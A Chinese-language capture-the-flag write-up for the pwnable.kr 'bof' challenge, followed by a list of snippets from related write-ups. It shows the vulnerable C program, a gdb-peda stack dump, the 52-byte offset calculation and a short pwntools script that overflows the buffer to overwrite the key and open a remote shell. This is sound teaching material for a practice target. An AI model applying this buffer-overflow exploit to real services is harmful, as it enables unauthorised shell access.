pwnable.kr bof之write up

阿新 • • 發佈：2017-08-01

car stdio.h ble str 不同 -1 [] 得到 imp

這一題與前兩題不同，用到了靜態調試工具ida

首先題中給出了源碼：

 1 #include <stdio.h>
 2 #include <string.h>
 3 #include <stdlib.h>
 4 void func(int key){
 5     char overflowme[32];
 6     printf("overflow me : ");
 7     gets(overflowme);    // smash me!
 8     if(key == 0xcafebabe){
 9         system(" 
/bin/sh");
10     }
11     else{
12         printf("Nah..\n");
13     }
14 }
15 int main(int argc, char* argv[]){
16     func(0xdeadbeef);
17     return 0;
18 }

分析源代碼：思路是緩沖區溢出

我們gdb走到func函數內部分析：

gdb-peda$ n

[----------------------------------registers-----------------------------------]
EAX: 0xffffd08c (":WUV\364oUV\260VUV\001")
EBX: 0xf7fbd000 --> 0x1a9da8 
ECX: 0xf7fd6000 ("overflow me : \n")
EDX: 0xf7fbe898 --> 0x0 
ESI: 0x0 
EDI: 0x0 
EBP: 0xffffd0b8 --> 0xffffd0d8 --> 0x0 
ESP: 0xffffd070 --> 0xffffd08c (":WUV\364oUV\260VUV\001")
EIP: 0x5655564f (<func+35>:	call   0xf7e77440 <gets>)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555644 <func+24>:	call   0xf7e77da0 <puts>
   0x56555649 <func+29>:	lea    eax,[ebp-0x2c]
   0x5655564c <func+32>:	mov    DWORD PTR [esp],eax
=> 0x5655564f <func+35>:	call   0xf7e77440 <gets>
   0x56555654 <func+40>:	cmp    DWORD PTR [ebp+0x8],0xcafebabe
   0x5655565b <func+47>:	jne    0x5655566b <func+63>
   0x5655565d <func+49>:	mov    DWORD PTR [esp],0x5655579b
   0x56555664 <func+56>:	call   0xf7e52e70 <system>
Guessed arguments:
arg[0]: 0xffffd08c (":WUV\364oUV\260VUV\001")
[------------------------------------stack-------------------------------------]
0000| 0xffffd070 --> 0xffffd08c (":WUV\364oUV\260VUV\001")
0004| 0xffffd074 --> 0x0 
0008| 0xffffd078 --> 0xbf 
0012| 0xffffd07c --> 0xf7ea90e6 (test   eax,eax)
0016| 0xffffd080 --> 0xffffffff 
0020| 0xffffd084 --> 0xffffd0ae --> 0x56b06aa6 
0024| 0xffffd088 --> 0xf7e1fc34 --> 0x2aad 
0028| 0xffffd08c (":WUV\364oUV\260VUV\001")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x5655564f in func ()

技術分享

看這一點：

技術分享

也就是說0xffffd08c就是overflowme數組開始的位置

而由

技術分享

得key 的地址0xffffd0c0

技術分享

所以只要輸入52便可成功覆蓋，便可跳轉執行system("\bin\sh")

於是寫exp:

1 #!/usr/bin/python
2 from pwn import *
3 io = remote("pwnable.kr","9000")
4 
5 key = 0xcafebabe
6 payload = "A" * 52 + p32(key)
7 
8 io.send(payload)
9 io.interactive()

運行得到

技術分享

pwnable.kr bof之write up

car stdio.h ble str 不同 -1 [] 得到 imp 這一題與前兩題不同，用到了靜態調試工具ida 首先題中給出了源碼： 1 #include <stdio.h> 2 #include <string.h> 3 #

pwnable.kr lotto之write up

write char tail 技術 match ima style string sign 源代碼： #include <stdio.h> #include <stdlib.h> #include <string.h> #

pwnable.kr cmd1之write up

變量雙引號 inux ron argv enter nbsp cnblogs linux通配符看一下源代碼： 1 #include <stdio.h> 2 #include <string.h> 3 4 int filter(char

reversing.kr easy crack 之write up

階段 clas 跳轉開始 ack flag http sin pre 之前學逆向感覺學得一踏糊塗，這階段好多師傅帶我，一定要好好學，重新開始，認真學習。來看打開可執行文件：用ollydbg載入，單步執行後停到了入口點：分析入口點，並沒有加殼，於是F9執行程序，跳

pwnable.kr --- bof題解

題目如下：我們下載完題目中給的兩個檔案，然後開啟bof.c檔案，我們可以看到原始碼: #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key)

pwnable.kr解題write up —— Toddler's Bottle（一）

1. fd #include <stdlib.h> #include <string.h> char buf[32]; int main(int argc, char* argv[], char* envp[]){ if(argc<2){

pwnable kr 之 random

(gdb) disass main Dump of assembler code for function main: 0x00000000004005f4 <+0>: push %rbp 0x00000000004005f5 <+1>

pwnable.kr 3.bof writeup

基本緩衝區溢位的利用。拿到題目訪問下http://pwnable.kr/bin/bof.c得到原始碼 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int

【pwnable.kr】 flag

github down 代碼 ring lag 程序 load 沒有 mob pwnable從入門到放棄第四題 Download : http://pwnable.kr/bin/flag 下載下來的二進制文件，對著它一臉懵逼，題目中說是逆向題，這我哪會啊。。。用i

【pwnable.kr】leg

輸入 read %d ssh http com fcn dump only pwnable從入門到放棄第八題。 Download : http://pwnable.kr/bin/leg.cDownload : http://pwnable.kr/bin/leg.asm s

【pwnable.kr】cmd1

strstr blog pre += 其中函數 /tmp har cmd 最近的pwnable都是linux操作系統層面的。 ssh [email protected]/* */ -p2222 (pw:guest) 首先還是下載源代碼： #includ

【pwnable.kr】cmd2

函數 environ 自動 memset 上一個 ima lin ret 保持這道題是上一個cmd1的升級版 ssh [email protected]/* */ -p2222 (pw:mommy now I get what PATH environmen

【pwnable.kr】 codemap

hunk see seed heap while malloc cati 根據 ont pwnable新的一題。 download: http://pwnable.kr/bin/codemap.exe ssh [email protected]/* */ -p

pwnable.kr-echo1-Writeup

blog inux cnblogs span style symbol bin sym utf-8 pwnable的echo1，一個棧溢出的漏洞，同樣以後再補上分析過程和思路，先放exp 1 #!/usr/bin/env python 2 # -*- coding:

12cR1 學習之 Starting up a CDB instance

pluggable database startup CDB To start a CDB instance, the current user must be a common user whose current container is the root. ##啟動CDB,需要使用root用

JMeter之Ramp-up Period（in seconds）說明

都在一個個人 read bin ogl 周期而是執行時間 Ramp-up Period（in seconds）【1】決定多長時間啟動所有線程。如果使用10個線程，ramp-up period是100秒，那麽JMeter用100秒使所有10個線程啟動並運行。每個線

Pwnable.kr WP

近期，開始將以前做的CTF的題目，全部整理一遍，寫個WP，也是為了督促自己，還需要學的東西還有很多。 Pwnable.kr fd 我們首先看到這道題的C原始碼：需要得到flag，則需要執行 system("/bin/cat flag"); 則必須 buf =

【reversing.kr逆向之旅】ImagePrc的writeup

看到這道題有點懵執行後只有一個Check按鈕中間是空白的不知道什麼鬼(最後才知道是個繪圖板) PEiD載入發現還是沒殼 Vc++6.0編寫的程式 IDA載入進行分析首先還是Shif

【reversing.kr逆向之旅】Music Player的writeup

VB寫的程式且沒有加殼執行看看還真是一個音樂播放器但是隻能播放一分鐘下面三個按鈕據我分析分別就是播放，暫停，重新開始播放當滑動到1分鐘時就會停止並彈窗1？ ?????

【reversing.kr逆向之旅】Replace的writeup

無殼 vc++程式載入Olydbg動態除錯分析就好可以通過下API斷點GetWindowTextW來找到關鍵程式碼因為它就是用來捕獲我們的輸入的隨意輸入(這裡可以發現只可以輸入數字長度什麼的倒是沒有限制) 就像下面一樣&nbs

pwnable.kr bof之write up

相關推薦